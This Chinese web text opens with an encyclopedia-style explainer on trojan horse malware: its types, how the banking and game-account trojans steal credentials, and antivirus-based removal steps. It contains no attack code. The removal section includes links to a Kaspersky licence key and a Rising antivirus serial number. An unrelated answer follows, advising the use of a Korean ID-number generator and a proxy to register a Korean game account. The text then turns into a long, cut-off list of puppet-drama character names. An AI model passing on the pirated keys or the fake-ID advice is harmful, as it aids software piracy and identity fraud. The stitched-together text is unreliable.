木马(Trojan)这个名字来源于古希腊传说(荷马史诗中木马计的故事,Trojan一词的本意是特洛伊的,即代指特洛伊木马,也就是木马计的故事)。
“木马”程序是目前比较流行的病毒文件,与一般的病毒不同,它不会自我繁殖,也并不“刻意”地去感染其他文件,它通过将自身伪装吸引用户下载执行,向施种木马者提供打开被种者电脑的门户,使施种者可以任意毁坏、窃取被种者的文件,甚至远程操控被种者的电脑。“木马”与计算机网络中常常要用到的远程控制软件有些相似,但由于远程控制软件是“善意”的控制,因此通常不具有隐蔽性;“木马”则完全相反,木马要达到的是“偷窃”性的远程控制,如果没有很强的隐蔽性的话,那就是“毫无价值”的。
它是指通过一段特定的程序(木马程序)来控制另一台计算机。木马通常有两个可执行程序:一个是客户端,即控制端,另一个是服务端,即被控制端。植入被种者电脑的是“服务器”部分,而所谓的“黑客”正是利用“控制器”进入运行了“服务器”的电脑。运行了木马程序的“服务器”以后,被种者的电脑就会有一个或几个端口被打开,使黑客可以利用这些打开的端口进入电脑系统,安全和个人隐私也就全无保障了! 木马的设计者为了防止木马被发现,而采用多种手段隐藏木马。木马的服务一旦运行并被控制端连接,其控制端将享有服务端的大部分操作权限,例如给计算机增加口令,浏览、移动、复制、删除文件,修改注册表,更改计算机配置等。
随着病毒编写技术的发展,木马程序对用户的威胁越来越大,尤其是一些木马程序采用了极其狡猾的手段来隐蔽自己,使普通用户很难在中毒后发觉。
木马的种类
[编辑本段]
1 网络游戏木马
随着网络在线游戏的普及和升温,我国拥有规模庞大的网游玩家。网络游戏中的金钱、装备等虚拟财富与现实财富之间的界限越来越模糊。与此同时,以**网游帐号密码为目的的木马病毒也随之发展泛滥起来。
网络游戏木马通常采用记录用户键盘输入、Hook游戏进程API函数等方法获取用户的密码和帐号。窃取到的信息一般通过发送电子邮件或向远程脚本程序提交的方式发送给木马作者。
网络游戏木马的种类和数量,在国产木马病毒中都首屈一指。流行的网络游戏无一不受网游木马的威胁。一款新游戏正式发布后,往往在一到两个星期内,就会有相应的木马程序被制作出来。大量的木马生成器和黑客网站的公开销售也是网游木马泛滥的原因之一。
2 网银木马
网银木马是针对网上交易系统编写的木马病毒,其目的是**用户的卡号、密码,甚至安全证书。此类木马种类数量虽然比不上网游木马,但它的危害更加直接,受害用户的损失更加惨重。
网银木马通常针对性较强,木马作者可能首先对某银行的网上交易系统进行仔细分析,然后针对安全薄弱环节编写病毒程序。如2004年的“网银大盗”病毒,在用户进入工行网银登录页面时,会自动把页面换成安全性能较差、但依然能够运转的老版页面,然后记录用户在此页面上填写的卡号和密码;“网银大盗3”利用招行网银专业版的备份安全证书功能,可以**安全证书;2005年的“新网银大盗”,采用API Hook等技术干扰网银登录安全控件的运行。
随着我国网上交易的普及,受到外来网银木马威胁的用户也在不断增加。
3 即时通讯软件木马
现在,国内即时通讯软件百花齐放。QQ、新浪UC、网易泡泡、盛大圈圈……网上聊天的用户群十分庞大。常见的即时通讯类木马一般有3种:
一、发送消息型。通过即时通讯软件自动发送含有恶意网址的消息,目的在于让收到消息的用户点击网址中毒,用户中毒后又会向更多好友发送病毒消息。此类病毒常用技术是搜索聊天窗口,进而控制该窗口自动发送文本内容。发送消息型木马常常充当网游木马的广告,如“武汉男生2005”木马,可以通过MSN、QQ、UC等多种聊天软件发送带毒网址,其主要功能是**传奇游戏的帐号和密码。
二、盗号型。主要目标在于即时通讯软件的登录帐号和密码。工作原理和网游木马类似。病毒作者盗得他人帐号后,可能偷窥聊天记录等隐私内容,或将帐号卖掉。
三、传播自身型。2005年初,“MSN性感鸡”等通过MSN传播的蠕虫泛滥了一阵之后,MSN推出新版本,禁止用户传送可执行文件。2005年上半年,“QQ龟”和“QQ爱虫”这两个国产病毒通过QQ聊天软件发送自身进行传播,感染用户数量极大,在江民公司统计的2005年上半年十大病毒排行榜上分列第一和第四名。从技术角度分析,发送文件类的QQ蠕虫是以前发送消息类QQ木马的进化,采用的基本技术都是搜寻到聊天窗口后,对聊天窗口进行控制,来达到发送文件或消息的目的。只不过发送文件的操作比发送消息复杂很多。
4 网页点击类木马
网页点击类木马会恶意模拟用户点击广告等动作,在短时间内可以产生数以万计的点击量。病毒作者的编写目的一般是为了赚取高额的广告推广费用。此类病毒的技术简单,一般只是向服务器发送HTTP GET请求。
5 下载类木马
这种木马程序的体积一般很小,其功能是从网络上下载其他病毒程序或安装广告软件。由于体积很小,下载类木马更容易传播,传播速度也更快。通常功能强大、体积也很大的后门类病毒,如“灰鸽子”、“黑洞”等,传播时都单独编写一个小巧的下载型木马,用户中毒后会把后门主程序下载到本机运行。
6 代理类木马
用户感染代理类木马后,会在本机开启HTTP、SOCKS等代理服务功能。黑客把受感染计算机作为跳板,以被感染用户的身份进行黑客活动,达到隐藏自己的目的。
首先找到感染文件,其手动方法是结束相关进程然后删除文件,但是现在有很多木马专杀的软件可以借助软件删除。
木马和病毒都是一种人为的程序,都属于电脑病毒,为什么木马要单独提出来说呢大家都知道以前的电脑病毒的作用,其实完全就是为了搞破坏,破坏电脑里的资料数据,除了破坏之外其它无非就是有些病毒制造者为了达到某些目的而进行的威慑和敲诈勒索的作用,或为了炫耀自己的技术 "木马"不一样,木马的作用是赤裸裸的偷偷监视别人和盗窃别人密码,数据等,如盗窃管理员密码-子网密码搞破坏,或者好玩,偷窃上网密码用于它用,游戏帐号,股票帐号,甚至网上银行帐户等达到偷窥别人隐私和得到经济利益的目的所以木马的作用比早期的电脑病毒更加有用更能够直接达到使用者的目的!导致许多别有用心的程序开发者大量的编写这类带有偷窃和监视别人电脑的侵入性程序,这就是目前网上大量木马泛滥成灾的原因鉴于木马的这些巨大危害性和它与早期病毒的作用性质不一样,所以木马虽然属于病毒中的一类,但是要单独的从病毒类型中间剥离出来独立的称之为"木马"程序。
一般来说一种杀毒软件程序,它的木马专杀程序能够查杀某某木马的话,那么它自己的普通杀毒程序也当然能够杀掉这种木马,因为在木马泛滥的今天,为木马单独设计一个专门的木马查杀工具,那是能提高该杀毒软件的产品档次的,对其声誉也大大的有益,实际上一般的普通杀毒软件里都包含了对木马的查杀功能如果现在大家说某某杀毒软件没有木马专杀的程序,那这家杀毒软件厂商自己也好像有点过意不去,即使它的普通杀毒软件里当然的有杀除木马的功能。
还有一点就是,把查杀木马程序单独剥离出来,可以提高查杀效率,现在很多杀毒软件里的木马专杀程序只对木马进行查杀,不去检查普通病毒库里的病毒代码,也就是说当用户运行木马专杀程序的时候,程序只调用木马代码库里的数据,而不调用病毒代码库里的数据,大大提高木马查杀速度我们知道查杀普通病毒的速度是比较慢的,因为现在有太多太多的病毒每个文件要经过几万条木马代码的检验,然后再加上已知的差不多有近10万个病毒代码的检验,那速度岂不是很慢了省去普通病毒代码检验,是不是就提高了效率,提高了速度呢 也就是说现在好多杀毒软件自带的木马专杀程序只查杀木马而一般不去查杀病毒,但是它自身的普通病毒查杀程序既查杀病毒又查杀木马!
如何防御木马病毒?
[编辑本段]
木马查杀(查杀软件很多,有些病毒软件都能杀木马)
防火墙(分硬件和软件)家里面的就用软件好了
如果是公司或其他地方就硬件和软件一起用
基本能防御大部分木马,但是现在的软件都不是万能的,是不?还要学点专业知识,有了这些,你的电脑就安全多了
现在高手也很多,只要你不随便访问来历不明的网站,使用来历不明的软件(很多盗版或破解软件都带木马,这个看你自己经验去区分),如果你都做到了,木马,病毒。就不容易进入你的电脑了。
如何删除木马病毒 ?
[编辑本段]
可以下载卡巴斯基(建议先卸载其他杀毒软件)绿鹰PC万能精灵
也可以下载瑞星杀毒软件(建议先卸载其他杀毒软件)
卡巴斯基搜索下就可以找到下载,其授权key到这里下载:http://iasksinacomcn/ishare/downloadphpfileid=379586
绿鹰PC万能精灵http://iasksinacomcn/ishare/downloadphpfileid=335597
瑞星杀毒2008 http://gorisingcomcn/download/indexhtm
他的sn: Ew7S5NLyptbybbpt
1、禁用系统还原(Windows Me/XP)
如果您运行的是 Windows Me 或 Windows XP,建议您暂时关闭“系统还原”。此功能默认情况下是启用的,一旦计算机中的文件被破坏,Windows 可使用该功能将其还原。如果病毒、蠕虫或特洛伊木马感染了计算机,则系统还原功能会在该计算机上备份病毒、蠕虫或特洛伊木马。
Windows 禁止包括防病毒程序在内的外部程序修改系统还原。因此,防病毒程序或工具无法删除 System Restore 文件夹中的威胁。这样,系统还原就可能将受感染文件还原到计算机上,即使您已经清除了所有其他位置的受感染文件。
此外,病毒扫描可能还会检测到 System Restore 文件夹中的威胁,即使您已将该威胁删除。
注意:蠕虫移除干净后,请按照上述文章所述恢复系统还原的设置。
2、将计算机重启到安全模式或者 VGA 模式
关闭计算机,等待至少 30 秒钟后重新启动到安全模式或者 VGA 模式
Windows 95/98/Me/2000/XP 用户:将计算机重启到安全模式。所有 Windows 32-bit 作系统,除了Windows NT,可以被重启到安全模式。更多信息请参阅文档 如何以安全模式启动计算机 。
Windows NT 4 用户:将计算机重启到 VGA 模式。
扫描和删除受感染文件启动防病毒程序,并确保已将其配置为扫描所有文件。运行完整的系统扫描。如果检测到任何文件被 DownloadTrojan 感染,请单击“删除”。如有必要,清除 Internet Explorer 历史和文件。如果该程序是在 Temporary Internet Files 文件夹中的压缩文件内检测到的,请执行以下步骤:
启动 Internet Explorer。单击“工具”>“Internet 选项”。单击“常规”选项卡“Internet 临时文件”部分中,单击“删除文件”,然后在出现提示后单击“确定”。在“历史”部分,单击“清除历史”,然后在出现提示后单击“是”。
3、关于病毒的危害,DownloadTrojan会 执行以下作:
进入其作者创建的特定网站或 FTP 站点并试图下载新的特洛伊木马、病毒、蠕虫或其组件。
完成下载后,特洛伊木马程序将执行它们。
中了木马不能打开杀毒软件可以用360安全卫士安全启动来先修复一下
进入韩服英雄联盟官方,勾选官方游戏协议,选择身份验证。然后输入账号提交后等待审核即可。具体步骤如下:
1、登陆lol韩服官网:英雄联盟韩服官网,点击右上角注册。
2、勾选官方游戏协议,然后进入下一步。
3、选择身份验证。
4、选择第三个按钮,选择18岁以上。
5、点击已满18岁,填写姓名与身份证号。
6、点击蓝色框,进行下一步。
7、输入你的有关信息(账号,密码,邮箱,提问,回答,手机,地址,验证码区分大小写!)
8、出现如下页面代表注册完毕,接下来就可以玩啦。
注意事项:
韩国LOL账号注册需要韩国身份证,可以试试从网上下载个韩服身份证号码生成器,然后注册,记得注册时开代理。
够吗~~?
弃天帝,拂樱斋主,苍月银血,火狐夜麟(黄泉),幽溟,爱染嫇娘,百罹刑迹,天者,笑剑钝,醉饮黄龙,刀无极,啸日猋,枫岫主人,少独行,罗喉,君曼睩,九界佛皇,天蚩极业,爱祸女戎
,问天敌,曲指邪怒,夜暴双镰,梦语独断,鬼艳织香,勾首紫蜒,骨讽蓝嚣,玩命丑笑,天堂之萼,禁种虫父,养骨者,六轮鬼贼,销骨箕伯,九阴魔蝎,叛经恶蠹,沧海平,刀无形,刀无我,刀无心,玉刀爵,御不凡,炎龙,天武师,地武师,人武师,春雨,夏雷,秋风,冬雪,夜风行,悲雨泣,流水心,月光吟,寒冰语,孤影笑,暗影魑首,南宫连城,破匣求禅,夜孽噬影,漠刀绝尘,冰华,一夕海棠,夜行舟,眩迷,逆叛,隐欺,邪念,雨潇潇,古灯佛,五蕴法刚,末日骄阳,九州一剑知,刑道者,玉倾欢,侠肠无医,万古长空(醉仔),荆触邪,殓尸不化骨,收魂咒无怨,天不孤,下酆都,明珠求瑕,绝情书,金好牙,留杀名家,不二做,杀僧不留佛,萨安(游子安),问师西来意,雷霆一武禅,宗喀尔,皇迦天,玄藏不思议,竺宗师,摩诃准,赞非量,毘邪罗,沙克汗,问剑孤鸣,慕非白,邪亦正,正亦邪,玉阳君,狂河冰烈,火中雪,晴时不见荷,东风怒雪,何复求,柳竹公,织语长心,神母瑶姬,炼霄元君,六铢衣,千叶传奇,未来之宰,妖溺天,神患,左狱判官,独眼邪降,凛,暴雨横祸,邪见三毒,大红袍,恶海娇祖,一枕眠,凤凰鸣,雅僧佛公子,阎王锁,天狼星,白小茶,司徒偃,央森,饶悲风,月灵犀,曲怀觞,太史候,东方羿,不死鸟漂,左手香,花无蝶,慕归心,何必笑,兰九阳,尉迟骄雄,昭穆尊,尹秋君,宵,九祸,海咪咪,田乔,守墓人,舞先姬,盲夫子,七巧神驼,闻人千秋,御法僧,执律僧,印戒僧,谛心僧,翳毒无痕,奇蛊夫,磨镜僧,认字僧,逆头僧,酒僧不醒,大力丸,乐波君,风不知,紫宫太一,上官寻命,风满袖,凌沧水,楚君仪,奉夜之能,修罗邪子,斩颅夜叉,云垂野,千浮浪,法无吾,璎珞耶提,南冥道真,德充符,圣耀刀赏,异贤剑殊,鬼仆,浑尸,摄元鬼童,沙河罗汉,光明尊者,无垢尊者,一瓢仙,悟僧痴迷,赤獳,狂走,苍,饮不醉,醉不知,贪杯买醉人,靛羽风莲,寒青,龙武剑客,平江逸,翠山行,白雪飘,卫无私,一步莲华,八方横野,越小枫,善法天子,血断机,莎罗曼,黑发剑者,百里神骏,戤戮狂狶,背九命,紫宫彤麟,紫宫宣夜,紫宫远,紫宫离,紫宫遥,紫宫日煌,紫宫月希,紫宫星罗,袭灭天来,散云愁,剑寻千步痕,刀影不留踪,不老城太辅,不老城太师,金错刀荒,银钏剑冯,识能龙,识玲珑,彝灿天,墨渊水莲,祖祭司,车车老,九章伏藏,冷海东郎,赤山西君,鬼针叟,赤雷隆,羽白旋,修真,断罪,灭业,哭麻衣,桑道凉,沐紫瑛,陶朱朱,殷芊嫿,鱼晚儿,香罗,楚莹,斐季,梁堂百回枪,摩诃戒者,聂商,凌宇刀,寒逸剑,陆晏弓,飘舟神隐,忘残年,月漩涡,殷末箫,绿江潮,冷泉少,黑玄离,绝刃独步,冰锋无影,戒神老者,补剑缺,一式文使,黄泉吊命,西城风流子,玉蟾宫,毘非笑,法云子,鼓琴人,道清子,灵湘子,碧霞君,八津蛮,破军天幕,小猴,汲无踪,笑风尘,玉世香,紫宫秋棠,破军独魁,正奇老人,优昙善师,病梅先生,蒯独渺,六祸苍龙,寂寞侯,无名,箫中剑,殷芊妘,蕙茗,王云,刖侠,榴莲,番石榴,文字春,九弦断天刃,慕天洲,悲曲绝世尘,萧瑟春秋,四非凡人,白妃樱,紫青琉,梅挽香,银月黎,朱厌剑灵,猫大人,巫祈,巫觋,华鹤仙者,武堂二相,一品皇绶,神魁战武,宇文鹰,风飞沙,冷醉,冷霜城,死海冰魔,木姥姥,呼拉,金不换,赫歆,三口剑,西枭,眉笑佬,人面棺,虎奔风,狼狩野,萧振岳,冷滟,千流影,爱三京,策马天下,引路人,迎宾客,神鹰眼七,血霜剪,追月狐,春无极,卧九案,司烨,小摩,寂童,爱儿,惜梨花,绍七娘,寒沙鬼蜮,八分仪,枫神官,柳神官,剑墨书,爱蔻童子,独笑寒丰,长平无终,弓之月神,悲无声,疾雨,纪堂,佬先生,北野真,金无患,蓝暹,青逻,银鍠黥武,扬日宫维,竹流刃,枫儿,行空,丧喜行差,司命拘役使,文执官,武执官,问天谴,圣阎罗,允爱君,封骨衣,杀身老,刑天,穷奇,无肠,朱蛾,姬孤穷,星光,沙伯,九江春,柳飞絮,杜龙吟,骁易,楼更雨,江封岳,禅洪笔,忘魂人,离魄者,剑十地,逆乾坤,司马无悔,师九如,鬼伶仃,梅神官,妙筑玄华,嗜杀者,莫沧桑,皇甫定涛,封书,风桦,慕容灵犀,一两势万钧,边城孤军,役行者,火狐,风神,流杰,墨长老,犬若丸,左翼骖,右翼骖,朱闻苍日,陶偶,云湘,液凝大辅,练峨眉,申屠东流,鬼梁天下,邪郎,魔刺儿,蟠凶,封千机,舍一仇,妙如诗,脑还颠,泊寒波,号昆仑,残林之主,破玄奇,无人爱,断雁西风,贾窈娇,天人文殊,大悲文殊,定心,定性,定灵,天法圣子,浮悠圣子,刀瘟,寰宇奇藏,羽人非獍,白发剑者,愁落暗尘,赦生童子,元祸天荒,别见狂华,任沉浮,宫紫玄,一阐提,八叶莲,天座,五圣师藏,摩罗师藏,如阿师藏,萨薄师藏,石天王,殁惑之眼,靛雷龙残,夜啼鸟,醒恶者,倾君怜,色无极,九方墀,宫楼雪,言倾城,金八珍,明镜秋霜,笙少乐,留三分,鬼梁飞宇,烛幽微,黄商子,继断离,阎尸缸,悟真,秋阙主少,五色妖姬,问琵琶,莫夺灵,恨不逢,奉刀,戏奴,风似翦,行如电,争不僧,画魂,薄之刃,问死官,应江潮,狂龙一声笑,鬼知,冥见,朱痕染迹,孤独缺,贾命公,影之无,向日斜,流剑谈月,寻翼兵河,啸引战川,珠遗公主,燕归人,翳流教主,妖闻,邪慧,魔识,灵观,小红,雪狮儿,杯中仙,疯魔恶盗,哑残怨女,姬小双,阎魔旱魃,镜中花,金包银,姥无艳,诀尘衣,云拢镇,剑雪无名,一剑封禅,邓九五,东方鼎立,金身猴童,非影,幽泉,夜狩,月无波,
凤白头,灭定师太,红叶夫人,天险刀藏,白猿,无悼一人庸,郢书,惠比寿,吞佛童子,破戒僧,慕少艾,阿九,圆儿,金战战,惠施儿,蛊皇,寒山意,冷水心,刁不同,旁徨迷,贪嗔误,费思量,四方僧,穿玉霄,定天律,帝獒,笏君卿,耆耋耄,圣踪,邪影,阴川蝴蝶君,圣昙岚赫,磋峨,萧宇,识中玄,厉赤狮,飞坎狼,坤步邪枭,箴有力,铁峰原,月镜公主,圣不贤,释非真,道无法,夜非,北辰凤先,神堪鬼斋,夜鸺部队,叶明,江仲逸,轰火狩,蛊神乐,皮鼓师,白行者,八忏,公孙月,燕非青,野胡儿,六丑废人,弥陀,千色,令狐神逸,南陵渡,武千群,无量佛尊,九戒,婀难,净水台,殊舍离,无相证空,无相证莲,不望尘寰,邪,琴绝弦,情杀,掌灯罗汉,跛箫,章袤君,醉花月,血狼牙,封嬷,夜重生,刀薄命,剑无行,骨箫,童欲爱,旖艳衷情,伏天塘,鬼祚师,太瘦生,枯行者,名战,红寅,雷迪,邯宁,九肱,枯树天,矮驼地,平凡人,君枫白,楚华容,铁十三,鬼笔神匠,富山高,震天苍璧,月吟荷,权九江,三教罪人,楚王孙,莫松罕,点松涛,弄潮生,风十翼,妖心陀,北辰元凰,长孙佑达,青蚵嫂,北辰胤,北辰伯英,北辰仲远,寇刀飞殇,长孙太后,北辰望,铁常奂,玉阶飞,神武侯,长孙护,炼邪师,渡香蝶,渡江修,鼎天拳,地理司,赤封扬,枫亭刀念,北辰泓,吴一针,幻形,非循,腾虚,穆里耶,摩珂,沙度笙,冷艳色,独夜人,流川飘渺,竹水琉,玉界尺,离魂,茶理王,花伴月,鱼游水,雁穿云,端宾锖叶,凌曲锖叶,盛律锖叶,鼎勾傩叶,午咸傩叶,痴怪,四分之三,默言歆,穆仙凤,希恩,苏安,维特,镜玄宗,变裔天邪,孤影,南柯补梦,阇皇西蒙,冰爵褆摩,一念即忘,离菲大公,赖特大公,莫留斯伯爵,洛航伯爵,塔德侯爵,雅修子爵,七笑,八颠,狄,金妍华妃,安札西,无伦天,智音天,焰摩,韦陀,班都巴,杨玛巴,邪之子,半分之间,姜,嬷嬷,弄三平,阿全,武痴,邪帝,苍冢,鬼鳍镖,邪眼飞踪,罗修王,骇形矫骨,逐鹿飞仙,牧罕,莫德,扬赞傩叶,凶瞳,炎罗鬼宿,回影断魂丧,骧,陌上尘,落秋心,绢刀,地狱人形师,旋弋女,柳千韵,末苍云,罗衣宫主,青衣宫主,玛衣宫主,凶流道,娲姥,能鬼,白杨女,殷雷杭特,魃女魁,魈魅影,夜凌,冥轮法魁,惊妖,邪魂,广目天,权氏叶,稽咸,叶,双锖叶,法朝官,涛没,弥封,掏膺,耶黎女神,封淮雨,夏平阳,尘道少,任飞扬,公子雨,段忍,南华清君,审判者,女阴阳师,影十字,聂求刑,神渊佛者,玄武真主,天章圣儒,覆天殇,战天戟,雪飘染,旦丁,造邪锋,五行陀,惊雷狂枭,苍白奇子,宫战,段章甫,北川飞,蜀道行,金小侠,北川炼,剑南天,步微霜,飞雪白,贺卫宇,颜贯丘,沙罗,冷观,战劫金戎,灵轲,辩机僧,开阳子,极玄子,河仪,虚静,尊维,礼道,仇无恩,灵轩,灵辙,易伯书,佛剑分说,剑苍意,桐文剑儒,巽命,殷玳,杜一苇,剑经武,剑子骞,剑傲流,蓝英,半君邪,惨绿色,九齐桓,巫六奇,凋凛,猊戬傩叶,魔龙祭天,七相,八识,疏楼龙宿,剑子仙迹,梵刹伽蓝,翔达,翔维,歧华氏叶,稻明,明月心,恨刀英雄,阴阳师,夜留影,女萝辟命,凌罗寐影,天罗寐影,邪卷杀魂,炎灵子,炼无心,命世风流,幽魅幻亟,裴元,佩奇,裴俊,殁算虚空,顷千踪,九鬼涂灵,宋翕庸,洪锥杵,楚伯颜,一念,空空大师,清忧道人,劈魂刀,文聱傩叶,骈章傩叶,袂雪傩叶,靡月氏叶,骊日氏叶,戮秋氏叶,勾媚魇笙,血玲珑,金瓜孙,步怀真,赤翎鬼,九幽,邪剑天罡,萧羽傩叶,宁,傩叶,策衍先座,柳鹪,三昧,擎浪天,天燎金戈,地烈荒马,青琨,叶,绣墨氏叶,非懿氏叶,玄掣锖叶,曼荼迦叶,幻臆流鸿,悼梦欢休,白霭灵座,金犀武座,东方语,寒凌霜,平剑江湖,紫月挥虹,七杀火羚,路斜阳,萧易水,薛长风,屈刀武林,柳无色,柳湘音,醉不醒,邱霍蛉叶,冰心血魄,虎帅,禅那大师,离经叛道,吴了然,妖灵女源,航谷风,满月女,妖荧,毒赤磷,雷邪,徐行,华菱女,冷非颜,飞梭空渡,幻沙魇,银刃雪虎,赤雨火猿,象王长老,岳驼,白城舆,冰川伽皇,晏清,右文丞,左文丞,傲刀缳莺,湛民,褐蝎,季中军,韦莽,魏十方,华武修,蚤千里,开膛镰刀手,华羽火鸡,傲刀苍雷,织网邪蛛,浪千山,霓裳,碧瑶,傲刀青麟,冰川芸姬,晏河,鬼面具,发剑无痕,望月天狼,苍茫荒狮,怒鸣飞雁,傲刀玄龙,烟花客,纪腾云,周八伯,苦心大师,神枭,紫蝶天衣,莫修,霍真,螭蟾王,赤鹿刀,黑珠,苗飞飞,厉邪天,珀琥,靳无咎,奚容楚,仇长天,巫孙彻,苍天涯,晚曲悲宵,石雷鸣,项殷风,赤蝎子,智蝼蚁,血钩飞蛾,吸魂妖蛉,吾太蚣,毒手回魂,千手先生,东无君,西无君,南无君,北无君,刃双飞,岱钩,飞魈,夜留影,冷香书客,逆天杀,剡斩,流焰,司空旋,无明大师,寒笑石,藏灵子,沐流尘,离月,极道天权,诀日,王隐,荒童,谬龄儿,裴千己,乐真子,广寒子,晏虚子,威临子,旋玑子,缇娃,血魅鬼束,夜岸鬼僧,卧江子,银狐,醉轻侯,金苍龙,紫嫣夫人,九曲邪君,犴妖神,迷罗涅印,燕子丹,高天昂,乐进,武承毅,卫青,燕飞虹,容衣,灭轮回,邹纵天,长河南星,绿钗,黄羽,白马纵横,认吾师,幻魅执法首,冥界裁判官,宇飘风,向天借命,百邑城,寒月蝉,青璃,翠玉,千形百藏手,百朝臣,逍遥子,幻踪,飘影,梦杀,虚空,金子陵,南宫笑,啸千军,龙灵,虎浪,五童凶煞,绝鸣子,裔春秋,刑天师,也呆,柳伯尉,啸殷文,黎青狄,殷无命,五咸君,北玄泣,负平生,渡迷航,司徒恨,悲悼尸灵,龙魁海,生死双卫,刀独行,观世寂莲,湛江云,牟尼上师,净琉璃,风泣血,殁锋,武咸尊,冰川孤辰,四无君,天之翼,绝烨,刀鬼,伴刀刑者,旋空疾鹰,苗蜜,嘎库喽契,
哥库喽契,冷四卦,横千秋,剑中求,集释尊者,灭释尊者,牛真勇,马素楠,珠婆婆,百里中,令飙扬,白发生,向天震,命如丝,焰灵枯僧,血剑罗刹,笑中箭,瞽叟,浪不惜,一枝花,飞将,狩将,后九翎,鬼隐,舒石公,炎,兵燹,曼陀,泣裟罗,奇幻双姥,极刀双痴,无量,无空,无诃,狂叱,贝叶,邪猿,孙能者,常异人,玉佛圣,梨耶大师,普贤大师,云衲大师,文知慧日,苏陀,如嫣,偃云溪,姑射女神,黑重川,波旬,阎达,女琊,迷达,三刀魂,上官奇缘,百丈逃禅,弦音,公孙小偷,还月祖师,风之痕,忆秋年,燃灯,鹫默心,麦十细,普雨,童冷,忘千岁,姬无花,香七雪,惜花意,彩女,诛天,骨刀,权妃,妖后,掩薄命,影中残,火狮子,病骨爪,离风剪,蠹尸人,鬼神将,剑辰,白秋水,解玉龙,一雨愁,五色妖魃,川凉剑夫,钢翼飞猿,独孤遗恨,冥河画匠,卷三宗,策谋略,黑鹰,战雕,地煞,月鸣孤魂,妖刀帅,刃奇书,刀魁,刀将,天忌,凯,定风愁,一字师,郭财临,虎仔,炮仔,阿泽仔,猫仔,瓠仔,薛厝边,云袖,赦木年,断水刃,释无念,无悲,苦释尊者,怒杀,残命,凶煞,裂魂,夺魄,不明,不白,大忍戒怒,大定藏海,大原照宇,大悲忏慧,大慈化裟,披魂纱,雅瑟风流,欲苍穹,风凌韵,箭翊,冀小棠,道释尊者,毒蝎女,遗世老,巫剑舟,骨冷笑,白衣剑少,异端神,越剑人,患无救,剑理,黑衣剑少,夜叉鬼,阴无独,阳有偶,天策真龙,洛子商,夜修罗,烈武夷,夜露收魂,阴流影,慑藏影,花离影,凤栖梧,竹丑,步双极,女煞神,诸葛晚照,诸葛萍,定浑,望天客,天聋,地哑,人盲,虎纹真人,燕形双侠,忆秋年,诛天,七大灵首,虫人鬼僧,乔夫,渡生剑,右护法,碧眼夜枭,清夷师太,三阴巫姥,九阳,十二司祭,东陵少主,苍雪生,巴卦,七海游霞,今雨客,左辅,经天子,病剑叟,紫星眉,擒天刀,万里云枭,九念如来,悦兰芳,路光明,月飘霜,驭武宫主,驯刀者,孤迹苍狼,指魔,吾无名,右弼,穿云豹,司权,冲灵剑,销魂夜媚,幻化上人,养尸子,善藏,鬼蛉盲剑,血剑无痕,仇剑老,孽恶童,石灵人,秋羽迎霜,黑波陀,邯耶郎,穷八极,仲云,瑟云,霓云,左思明,巧心,佾云,文殊官,汗马军,曲云,九,栳,武修罗,烈嵬风,流浪者,冬玫,柳依依,太华秋,魔人兽,不二刀,牧剑子,牧山,牧海,阴灵鬼王,大愚,涎鬼,自华天女,雷战魈,司马剑秋,常不归,晏君临,倾天红,潇潇,乾司徒,唐谦,李爻,马云山,风十雨,苗逢春,巴结仔,茼蒿仔,青皮,飘茵,韶云,白如霜,邪神,半花容,司马鹏,读风官,游云,暴风君,千叶先生,莫干邪,黥烈,呼律奇,厉袈,夸隍,菩提因,菩提果,鬼龙太岁,魔童孤斗,飞令寿,刑破军,飘,蚩肉,弋何首,阿,昙,卧雪刀,黑木兰,管天杠,冷封尘,染飞烟,释童老,赞刀,太尉,珠英士,夸达也,贯刀石,西洋女剑客,九云冶,血眼沙陀,琴魔,龙,髯,月公,夜婆,冰清,白无垢,卧云,鹫灵寺三小僧,灯笼人,无量先生,西酆残雪,旋风杀手,步诗海,石中怪,积云,卷云,环儿,自在天女,集音堡主,叠云,层云,太阳女,蓝衣人,鲎,螂,沧海老鸟,星野残红,蘅佛子,四魔皇,圣法,飞魔,魑魔,封疆爵主,武奎风,刁心,一只眼,哑鹏,哑鸠,杀戮邪神,真田龙政,九千宵,单人悔,八魂刀,锺灵神岳,博文子,约礼君,弘道生,黑脑蜥,陆山,操刀者,魔灵手,破金眼,吸灵光,引路桀,醉剑东岳,银猿潘安,楼沉沉,楼森森,柳别鹤,梅郎,晏定邦,伐千军,金蜥,蓝蟾,战龙儿,鲁九,授云帅,破腥将,泪痕,奇中葩,妙极生,绝离子,伦歌吟,舞造论,寒天放,四界僧,龙眼佛,义海士,薄易人,云鹿英,高唐客,掠食者,高三甲,飞疆,屠残衣,赵干城,冷钩断七,杞人白舍,欲海剑真,秋末悲歌,磊公,帅轻皇,小还真,小无欲,小无忌,沉世老叟,云庐剑僧,凤眉尊者,斩海,渡鹤影,觉惟心,落烟霞,东霞,求心,银座飙手,边岁寒,摩诃台,赫瑶,屠形,屠相,赫沙,烈宵,烈冥,尸老,赫丹,十念僧,拾红,挽翠,廉清君,听音刀,圣知,圣定,圣慧,遮那,完图,易利金,无情丝,天魔御使,天魔,赤鬼,夜卫,苍崖,金次,靛魂,魏公贤,鉴世老,妖末,阎罗相,御魔像,刑老,梦中人,悉陀界,一水台,幸次郎,傲神州,叔夜衣,剑上卿,创世者,旱邪关,腥甲神,孤独夫,清傀儡,任枭雄,奚东城,无不爱,识三世,四寸奇迹,五通先生,截颅,飘雪银貂,大漠刺狼,狼女,龙王,乐仲道,八趾麒麟,啸狼王,泣花魂,君夫人,赤甲,洛阳丹客,太簇,姑洗,夷则,蕤宾,掠飞蓬,森罗魔神,白文泰,敬天侠,祝地客,曹仁汉,金吾术,华骝天,白妙贯,黑净空,柳藏,岩关,太公法,万钧势,渠黄地,赤骥山,白啸衣,骊水,绿雷,白风,山火,圣母,伊祁先生,顾重阳,赛文命,剑如冰,凤昭容,九锡君,逾输泽,莫召奴,野核,秘颅,魃将,魈将,金魔,大鸿胪,中鸿胪,小鸿胪,袁冬曲,安期君,无忌天子,白云娇娘,虎贲,龙骧,龟长老,鳖长老,鳌长老,狻猊,龙阁梭罗,常默衣,睚眦,狴犴,饕餮,椒图,忠贞之花,寒铁衣,烈无双,秋声飞羽,六聪天乞,华琉衣,蒲牢,蝮,愁月仙子,鬼矢,疾光,舍藏,螭吻,七海游僧,无咎,悔吝,凶贞,假朝子,权门宗矩,焦粕衣,刺爷爷,花爵百链生,裨善,左非,半缘君,司徒笑梦,魏玄宇,慧性,连天罡,辜铭鸿,齐泰,方界老童,千山樵老,不颠,天命老人,忘年,黑夜奔雷,欧阳胜天,北鹫,金鹤,玉鹤,沐观奇,贺松龄,啸天鹰,狄云青,青松客,断邪,诛心,赛伯乐,纸面阎罗,蠹